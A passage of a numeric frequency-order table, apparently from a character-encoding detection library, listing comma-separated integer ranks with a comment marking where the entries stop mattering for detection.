2069,1292,2070,2071,1445,2072,1446,2073,2074, 55, 588, 66,1447, 271,1092,2075,
1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850,
2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606,
2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449,
1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452,
949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112,
2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121,
2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130,
22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174, 73,1096, 231, 274,
962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139,
2141,2142,2143,2144, 11, 374, 844,2145, 154,1232, 46,1461,2146, 838, 830, 721,
1233, 106,2147, 90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298,
2150,1462, 761, 565,2151, 686,2152, 649,2153, 72, 173,2154, 460, 415,2155,1463,
2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747,
2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177, 23, 530, 285,
2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187,
2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193, 10,
2194, 613, 424,2195, 979, 108, 449, 589, 27, 172, 81,1031, 80, 774, 281, 350,
1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201,
2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972,
2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219,
2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233,
2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242,
2243, 521, 486, 548,2244,2245,2246,1473,1300, 53, 549, 137, 875, 76, 158,2247,
1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178,
1475,2249, 82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255,
2256, 18, 450, 206,2257, 290, 292,1142,2258, 511, 162, 99, 346, 164, 735,2259,
1476,1477, 4, 554, 343, 798,1099,2260,1100,2261, 43, 171,1303, 139, 215,2262,
2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702,
1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272, 67,2273,
295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541,
2282,2283,2284,2285,2286, 70, 852,1071,2287,2288,2289,2290, 21, 56, 509, 117,
432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187,
2294,1046,1479,2295, 340,2296, 63,1047, 230,2297,2298,1305, 763,1306, 101, 800,
808, 494,2299,2300,2301, 903,2302, 37,1072, 14, 5,2303, 79, 675,2304, 312,
2305,2306,2307,2308,2309,1480, 6,1307,2310,2311,2312, 1, 470, 35, 24, 229,
2313, 695, 210, 86, 778, 15, 784, 592, 779, 32, 77, 855, 964,2314, 259,2315,
501, 380,2316,2317, 83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484,
2320,2321,2322,2323,2324,2325,1485,2326,2327, 128, 57, 68, 261,1048, 211, 170,
1240, 31,2328, 51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335,
425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601,
1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395,
2351,1490,1491, 62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354,
1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476,
2361,2362, 332, 12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035,
416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498,
2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310,
1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389,
2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504,
1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505,
2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145,
1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624,
593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700,
2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221,
2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377,
644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448,
915, 489,2449,1514,1184,2450,2451, 515, 64, 427, 495,2452, 583,2453, 483, 485,
1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705,
1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465,
291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471,
2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997,
2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486,
797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187, 65,2494,
434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771,
585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323,
2499,2500, 49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491,
95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510,
161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519,
2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532,
2533, 25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199,
704, 504, 468, 758, 657,1528, 196, 44, 839,1246, 272, 750,2543, 765, 862,2544,
2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247,
1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441,
249,1075,2556,2557,2558, 466, 743,2559,2560,2561, 92, 514, 426, 420, 526,2562,
2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362,
2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583,
2584,1532, 54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465,
3, 458, 9, 38,2588, 107, 110, 890, 209, 26, 737, 498,2589,1534,2590, 431,
202, 88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151,
974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596,
2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601, 94, 175, 197, 406,
2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611,
2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619,
1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628,
2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042,
670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642, # 512, 256
#Everything below is of no interest for detection purpose
2643,2644,2645,2646,2647,2648,2649,2650,2651,2652,2653,2654,2655,2656,2657,2658,
2659,2660,2661,2662,2663,2664,2665,2666,2667,2668,2669,2670,2671,2672,2673,2674,
2675,2676,2677,2678,2679,2680,2681,2682,2683,2684,2685,2686,2687,2688,2689,2690,
2691,2692,2693,2694,2695,2696,2697,2698,2699,1542, 880,2700,2701,2702,2703,2704,
2705,2706,2707,2708,2709,2710,2711,2712,2713,2714,2715,2716,2717,2718,2719,2720,
2721,2722,2723,2724,2725,1543,2726,2727,2728,2729,2730,2731,2732,1544,2733,2734,
2735,2736,2737,2738,2739,2740,2741,2742,2743,2744,2745,2746,2747,2748,2749,2750,
2751,2752,2753,2754,1545,2755,2756,2757,2758,2759,2760,2761,2762,2763,2764,2765,
2766,1546,2767,1547,2768,2769,2770,2771,2772,2773,2774,2775,2776,2777,2778,2779,
2780,2781,2782,2783,2784,2785,2786,1548,2787,2788,2789,1109,2790,2791,2792,2793,
2794,2795,2796,2797,2798,2799,2800,2801,2802,2803,2804,2805,2806,2807,2808,2809,
2810,2811,2812,1329,2813,2814,2815,2816,2817,2818,2819,2820,2821,2822,2823,2824,
2825,2826,2827,2828,2829,2830,2831,2832,2833,2834,2835,2836,2837,2838,2839,2840,
2841,2842,2843,2844,2845,2846,2847,2848,2849,2850,2851,2852,2853,2854,2855,2856,
1549,2857,2858,2859,2860,1550,2861,2862,1551,2863,2864,2865,2866,2867,2868,2869,
2870,2871,2872,2873,2874,1110,1330,2875,2876,2877,2878,2879,2880,2881,2882,2883,
2884,2885,2886,2887,2888,2889,2890,2891,2892,2893,2894,2895,2896,2897,2898,2899,
2900,2901,2902,2903,2904,2905,2906,2907,2908,2909,2910,2911,2912,2913,2914,2915,
2916,2917,2918,2919,2920,2921,2922,2923,2924,2925,2926,2927,2928,2929,2930,1331,
2931,2932,2933,2934,2935,2936,2937,2938,2939,2940,2941,2942,2943,1552,2944,2945,
2946,2947,2948,2949,2950,2951,2952,2953,2954,2955,2956,2957,2958,2959,2960,2961,
2962,2963,2964,1252,2965,2966,2967,2968,2969,2970,2971,2972,2973,2974,2975,2976,
2977,2978,2979,2980,2981,2982,2983,2984,2985,2986,2987,2988,2989,2990,2991,2992,
2993,2994,2995,2996,2997,2998,2999,3000,3001,3002,3003,3004,3005,3006,3007,3008,
3009,3010,3011,3012,1553,3013,3014,3015,3016,3017,1554,3018,1332,3019,3020,3021,
3022,3023,3024,3025,3026,3027,3028,3029,3030,3031,3032,3033,3034,3035,3036,3037,
3038,3039,3040,3041,3042,3043,3044,3045,3046,3047,3048,3049,3050,1555,3051,3052,
3053,1556,1557,3054,3055,3056,3057,3058,3059,3060,3061,3062,3063,3064,3065,3066,
3067,1558,3068,3069,3070,3071,3072,3073,3074,3075,3076,1559,3077,3078,3079,3080,
3081,3082,3083,1253,3084,3085,3086,3087,3088,3089,3090,3091,3092,3093,3094,3095,
3096,3097,3098,3099,3100,3101,3102,3103,3104,3105,3106,3107,3108,1152,3109,3110,
3111,3112,3113,1560,3114,3115,3116,3117,1111,3118,3119,3120,3121,3122,3123,3124,
3125,3126,3127,3128,3129,3130,3131,3132,3133,3134,3135,3136,3137,3138,3139,3140,
3141,3142,3143,3144,3145,3146,3147,3148,3149,3150,3151,3152,3153,3154,3155,3156,
3157,3158,3159,3160,3161,3162,3163,3164,3165,3166,3167,3168,3169,3170,3171,3172,
3173,3174,3175,3176,1333,3177,3178,3179,3180,3181,3182,3183,3184,3185,3186,3187,
3188,3189,1561,3190,3191,1334,3192,3193,3194,3195,3196,3197,3198,3199,3200,3201,
3202,3203,3204,3205,3206,3207,3208,3209,3210,3211,3212,3213,3214,3215,3216,3217,
3218,3219,3220,3221,3222,3223,3224,3225,3226,3227,3228,3229,3230,3231,3232,3233,
3234,1562,3235,3236,3237,3238,3239,3240,3241,3242,3243,3244,3245,3246,3247,3248,
3249,3250,3251,3252,3253,3254,3255,3256,3257,3258,3259,3260,3261,3262,3263,3264,
3265,3266,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,1563,3278,3279,
3280,3281,3282,3283,3284,3285,3286,3287,3288,3289,3290,3291,3292,3293,3294,3295,
3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,
3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,
3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,
3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,
3360,3361,3362,3363,3364,1335,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,
3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,1336,3388,3389,
3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,
3406,3407,3408,3409,3410,3411,3412,3413,3414,1337,3415,3416,3417,3418,3419,1338,
3420,3421,3422,1564,1565,3423,3424,3425,3426,3427,3428,3429,3430,3431,1254,3432,
3433,3434,1339,3435,3436,3437,3438,3439,1566,3440,3441,3442,3443,3444,3445,3446,
3447,3448,3449,3450,3451,3452,3453,3454,1255,3455,3456,3457,3458,3459,1567,1191,
3460,1568,1569,3461,3462,3463,1570,3464,3465,3466,3467,3468,1571,3469,3470,3471,
3472,3473,1572,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,
1340,3487,3488,3489,3490,3491,3492,1021,3493,3494,3495,3496,3497,3498,1573,3499,
1341,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510,3511,1342,3512,3513,
3514,3515,3516,1574,1343,3517,3518,3519,1575,3520,1576,3521,3522,3523,3524,3525,
3526,3527,3528,3529,3530,3531,3532,3533,3534,3535,3536,3537,3538,3539,3540,3541,
3542,3543,3544,3545,3546,3547,3548,3549,3550,3551,3552,3553,3554,3555,3556,3557,
3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3568,3569,3570,3571,3572,3573,
3574,3575,3576,3577,3578,3579,3580,1577,3581,3582,1578,3583,3584,3585,3586,3587,
3588,3589,3590,3591,3592,3593,3594,3595,3596,3597,3598,3599,3600,3601,3602,3603,
3604,1579,3605,3606,3607,3608,3609,3610,3611,3612,3613,3614,3615,3616,3617,3618,
3619,3620,3621,3622,3623,3624,3625,3626,3627,3628,3629,1580,3630,3631,1581,3632,
3633,3634,3635,3636,3637,3638,3639,3640,3641,3642,3643,3644,3645,3646,3647,3648,
3649,3650,3651,3652,3653,3654,3655,3656,1582,3657,3658,3659,3660,3661,3662,3663,
3664,3665,3666,3667,3668,3669,3670,3671,3672,3673,3674,3675,3676,3677,3678,3679,
3680,3681,3682,3683,3684,3685,3686,3687,3688,3689,3690,3691,3692,3693,3694,3695,
3696,3697,3698,3699,3700,1192,3701,3702,3703,3704,1256,3705,3706,3707,3708,1583,
1257,3709,3710,3711,3712,3713,3714,3715,3716,1584,3717,3718,3719,3720,3721,3722,
3723,3724,3725,3726,3727,3728,3729,3730,3731,3732,3733,3734,3735,3736,3737,3738,
3739,3740,3741,3742,3743,3744,3745,1344,3746,3747,3748,3749,3750,3751,3752,3753,
3754,3755,3756,1585,3757,3758,3759,3760,3761,3762,3763,3764,3765,3766,1586,3767,
3768,3769,3770,3771,3772,3773,3774,3775,3776,3777,3778,1345,3779,3780,3781,3782,
3783,3784,3785,3786,3787,3788,3789,3790,3791,3792,3793,3794,3795,1346,1587,3796,
3797,1588,3798,3799,3800,3801,3802,3803,3804,3805,3806,1347,3807,3808,3809,3810,
3811,1589,3812,3813,3814,3815,3816,3817,3818,3819,3820,3821,1590,3822,3823,1591,
1348,3824,3825,3826,3827,3828,3829,3830,1592,3831,3832,1593,3833,3834,3835,3836,
3837,3838,3839,3840,3841,3842,3843,3844,1349,3845,3846,3847,3848,3849,3850,3851,
3852,3853,3854,3855,3856,3857,3858,1594,3859,3860,3861,3862,3863,3864,3865,3866,
3867,3868,3869,1595,3870,3871,3872,3873,1596,3874,3875,3876,3877,3878,3879,3880,
3881,3882,3883,3884,3885,3886,1597,3887,3888,3889,3890,3891,3892,3893,3894,3895,
1598,3896,3897,3898,1599,1600,3899,1350,3900,1351,3901,3902,1352,3903,3904,3905,
3906,3907,3908,3909,3910,3911,3912,3913,3914,3915,3916,3917,3918,3919,3920,3921,
3922,3923,3924,1258,3925,3926,3927,3928,3929,3930,3931,1193,3932,1601,3933,3934,
3935,3936,3937,3938,3939,3940,3941,3942,3943,1602,3944,3945,3946,3947,3948,1603,
3949,3950,3951,3952,3953,3954,3955,3956,3957,3958,3959,3960,3961,3962,3963,3964,
3965,1604,3966,3967,3968,3969,3970,3971,3972,3973,3974,3975,3976,3977,1353,3978,
3979,3980,3981,3982,3983,3984,3985,3986,3987,3988,3989,3990,3991,1354,3992,3993,
3994,3995,3996,3997,3998,3999,4000,4001,4002,4003,4004,4005,4006,4007,4008,4009,
4010,4011,4012,4013,4014,4015,4016,4017,4018,4019,4020,4021,4022,4023,1355,4024,
4025,4026,4027,4028,4029,4030,4031,4032,4033,4034,4035,4036,4037,4038,4039,4040,
1605,4041,4042,4043,4044,4045,4046,4047,4048,4049,4050,4051,4052,4053,4054,4055,
4056,4057,4058,4059,4060,1606,4061,4062,4063,4064,1607,4065,4066,4067,4068,4069,
4070,4071,4072,4073,4074,4075,4076,1194,4077,4078,1608,4079,4080,4081,4082,4083,
4084,4085,4086,4087,1609,4088,4089,4090,4091,4092,4093,4094,4095,4096,4097,4098,
4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,1259,4109,4110,4111,4112,4113,
4114,4115,4116,4117,4118,4119,4120,4121,4122,4123,4124,1195,4125,4126,4127,1610,
4128,4129,4130,4131,4132,4133,4134,4135,4136,4137,1356,4138,4139,4140,4141,4142,
4143,4144,1611,4145,4146,4147,4148,4149,4150,4151,4152,4153,4154,4155,4156,4157,
4158,4159,4160,4161,4162,4163,4164,4165,4166,4167,4168,4169,4170,4171,4172,4173,
4174,4175,4176,4177,4178,4179,4180,4181,4182,4183,4184,4185,4186,4187,4188,4189,
4190,4191,4192,4193,4194,4195,4196,4197,4198,4199,4200,4201,4202,4203,4204,4205,
4206,4207,4208,4209,4210,4211,4212,4213,4214,4215,4216,4217,4218,4219,1612,4220,
4221,4222,4223,4224,4225,4226,4227,1357,4228,1613,4229,4230,4231,4232,4233,4234,
4235,4236,4237,4238,4239,4240,4241,4242,4243,1614,4244,4245,4246,4247,4248,4249,
4250,4251,4252,4253,4254,4255,4256,4257,4258,4259,4260,4261,4262,4263,4264,4265,
4266,4267,4268,4269,4270,1196,1358,4271,4272,4273,4274,4275,4276,4277,4278,4279,
4280,4281,4282,4283,4284,4285,4286,4287,1615,4288,4289,4290,4291,4292,4293,4294,
4295,4296,4297,4298,4299,4300,4301,4302,4303,4304,4305,4306,4307,4308,4309,4310,
4311,4312,4313,4314,4315,4316,4317,4318,4319,4320,4321,4322,4323,4324,4325,4326,
4327,4328,4329,4330,4331,4332,4333,4334,1616,4335,4336,4337,4338,4339,4340,4341,
4342,4343,4344,4345,4346,4347,4348,4349,4350,4351,4352,4353,4354,4355,4356,4357,
4358,4359,4360,1617,4361,4362,4363,4364,4365,1618,4366,4367,4368,4369,4370,4371,
4372,4373,4374,4375,4376,4377,4378,4379,4380,4381,4382,4383,4384,4385,4386,4387,
4388,4389,4390,4391,4392,4393,4394,4395,4396,4397,4398,4399,4400,4401,4402,4403,
4404,4405,4406,4407,4408,4409,4410,4411,4412,4413,4414,4415,4416,1619,4417,4418,
4419,4420,4421,4422,4423,4424,4425,1112,4426,4427,4428,4429,4430,1620,4431,4432,
4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,1260,1261,4443,4444,4445,4446,
4447,4448,4449,4450,4451,4452,4453,4454,4455,1359,4456,4457,4458,4459,4460,4461,
4462,4463,4464,4465,1621,4466,4467,4468,4469,4470,4471,4472,4473,4474,4475,4476,
4477,4478,4479,4480,4481,4482,4483,4484,4485,4486,4487,4488,4489,1055,4490,4491,
4492,4493,4494,4495,4496,4497,4498,4499,4500,4501,4502,4503,4504,4505,4506,4507,
4508,4509,4510,4511,4512,4513,4514,4515,4516,4517,4518,1622,4519,4520,4521,1623,
4522,4523,4524,4525,4526,4527,4528,4529,4530,4531,4532,4533,4534,4535,1360,4536,
4537,4538,4539,4540,4541,4542,4543, 975,4544,4545,4546,4547,4548,4549,4550,4551,
4552,4553,4554,4555,4556,4557,4558,4559,4560,4561,4562,4563,4564,4565,4566,4567,
4568,4569,4570,4571,1624,4572,4573,4574,4575,4576,1625,4577,4578,4579,4580,4581,
4582,4583,4584,1626,4585,4586,4587,4588,4589,4590,4591,4592,4593,4594,4595,1627,
4596,4597,4598,4599,4600,4601,4602,4603,4604,4605,4606,4607,4608,4609,4610,4611,
4612,4613,4614,4615,1628,4616,4617,4618,4619,4620,4621,4622,4623,4624,4625,4626,
4627,4628,4629,4630,4631,4632,4633,4634,4635,4636,4637,4638,4639,4640,4641,4642,
4643,4644,4645,4646,4647,4648,4649,1361,4650,4651,4652,4653,4654,4655,4656,4657,
4658,4659,4660,4661,1362,4662,4663,4664,4665,4666,4667,4668,4669,4670,4671,4672,
4673,4674,4675,4676,4677,4678,4679,4680,4681,4682,1629,4683,4684,4685,4686,4687,
1630,4688,4689,4690,4691,1153,4692,4693,4694,1113,4695,4696,4697,4698,4699,4700,
4701,4702,4703,4704,4705,4706,4707,4708,4709,4710,4711,1197,4712,4713,4714,4715,
4716,4717,4718,4719,4720,4721,4722,4723,4724,4725,4726,4727,4728,4729,4730,4731,
4732,4733,4734,4735,1631,4736,1632,4737,4738,4739,4740,4741,4742,4743,4744,1633,
4745,4746,4747,4748,4749,1262,4750,4751,4752,4753,4754,1363,4755,4756,4757,4758,
4759,4760,4761,4762,4763,4764,4765,4766,4767,4768,1634,4769,4770,4771,4772,4773,
4774,4775,4776,4777,4778,1635,4779,4780,4781,4782,4783,4784,4785,4786,4787,4788,
4789,1636,4790,4791,4792,4793,4794,4795,4796,4797,4798,4799,4800,4801,4802,4803,
4804,4805,4806,1637,4807,4808,4809,1638,4810,4811,4812,4813,4814,4815,4816,4817,
4818,1639,4819,4820,4821,4822,4823,4824,4825,4826,4827,4828,4829,4830,4831,4832,
4833,1077,4834,4835,4836,4837,4838,4839,4840,4841,4842,4843,4844,4845,4846,4847,
4848,4849,4850,4851,4852,4853,4854,4855,4856,4857,4858,4859,4860,4861,4862,4863,
4864,4865,4866,4867,4868,4869,4870,4871,4872,4873,4874,4875,4876,4877,4878,4879,
4880,4881,4882,4883,1640,4884,4885,1641,4886,4887,4888,4889,4890,4891,4892,4893,
4894,4895,4896,4897,4898,4899,4900,4901,4902,4903,4904,4905,4906,4907,4908,4909,
4910,4911,1642,4912,4913,4914,1364,4915,4916,4917,4918,4919,4920,4921,4922,4923,
4924,4925,4926,4927,4928,4929,4930,4931,1643,4932,4933,4934,4935,4936,4937,4938,
4939,4940,4941,4942,4943,4944,4945,4946,4947,4948,4949,4950,4951,4952,4953,4954,
4955,4956,4957,4958,4959,4960,4961,4962,4963,4964,4965,4966,4967,4968,4969,4970,
4971,4972,4973,4974,4975,4976,4977,4978,4979,4980,1644,4981,4982,4983,4984,1645,
4985,4986,1646,4987,4988,4989,4990,4991,4992,4993,4994,4995,4996,4997,4998,4999,
5000,5001,5002,5003,5004,5005,1647,5006,1648,5007,5008,5009,5010,5011,5012,1078,
5013,5014,5015,5016,5017,5018,5019,5020,5021,5022,5023,5024,5025,5026,5027,5028,
1365,5029,5030,5031,5032,5033,5034,5035,5036,5037,5038,5039,1649,5040,5041,5042,
5043,5044,5045,1366,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,1650,5056,
5057,5058,5059,5060,5061,5062,5063,5064,5065,5066,5067,5068,5069,5070,5071,5072,
5073,5074,5075,5076,5077,1651,5078,5079,5080,5081,5082,5083,5084,5085,5086,5087,
5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102,5103,
5104,5105,5106,5107,5108,5109,5110,1652,5111,5112,5113,5114,5115,5116,5117,5118,
1367,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,1653,5130,5131,5132,
5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,
5149,1368,5150,1654,5151,1369,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161,
5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177,
5178,1370,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192,
5193,5194,5195,5196,5197,5198,1655,5199,5200,5201,5202,1656,5203,5204,5205,5206,
1371,5207,1372,5208,5209,5210,5211,1373,5212,5213,1374,5214,5215,5216,5217,5218,
5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,
5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,1657,5248,5249,
5250,5251,1658,1263,5252,5253,5254,5255,5256,1375,5257,5258,5259,5260,5261,5262,
5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,
5279,5280,5281,5282,5283,1659,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,
5294,5295,5296,5297,5298,5299,5300,1660,5301,5302,5303,5304,5305,5306,5307,5308,
5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,1376,5322,5323,
5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,1198,5334,5335,5336,5337,5338,
5339,5340,5341,5342,5343,1661,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353,
5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369,
5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385,
5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,1264,5399,5400,
5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,1662,5413,5414,5415,
5416,1663,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430,
5431,5432,5433,5434,5435,5436,5437,5438,1664,5439,5440,5441,5442,5443,5444,5445,
5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461,
5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477,
5478,1154,5479,5480,5481,5482,5483,5484,5485,1665,5486,5487,5488,5489,5490,5491,
5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507,
5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523,
5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539,
5540,5541,5542,5543,5544,5545,5546,5547,5548,1377,5549,5550,5551,5552,5553,5554,
5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570,
1114,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585,
5586,5587,5588,5589,5590,5591,5592,1378,5593,5594,5595,5596,5597,5598,5599,5600,
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,1379,5615,
5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,
5632,5633,5634,1380,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,
5647,5648,5649,1381,1056,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,
1666,5661,5662,5663,5664,5665,5666,5667,5668,1667,5669,1668,5670,5671,5672,5673,
5674,5675,5676,5677,5678,1155,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688,
5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,1669,5699,5700,5701,5702,5703,
5704,5705,1670,5706,5707,5708,5709,5710,1671,5711,5712,5713,5714,1382,5715,5716,
5717,5718,5719,5720,5721,5722,5723,5724,5725,1672,5726,5727,1673,1674,5728,5729,
5730,5731,5732,5733,5734,5735,5736,1675,5737,5738,5739,5740,5741,5742,5743,5744,
1676,5745,5746,5747,5748,5749,5750,5751,1383,5752,5753,5754,5755,5756,5757,5758,
5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,1677,5769,5770,5771,5772,5773,
1678,5774,5775,5776, 998,5777,5778,5779,5780,5781,5782,5783,5784,5785,1384,5786,
5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,1679,5801,
5802,5803,1115,1116,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815,
5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831,
5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847,
5848,5849,5850,5851,5852,5853,5854,5855,1680,5856,5857,5858,5859,5860,5861,5862,
5863,5864,1681,5865,5866,5867,1682,5868,5869,5870,5871,5872,5873,5874,5875,5876,
5877,5878,5879,1683,5880,1684,5881,5882,5883,5884,1685,5885,5886,5887,5888,5889,
5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,
5906,5907,1686,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,
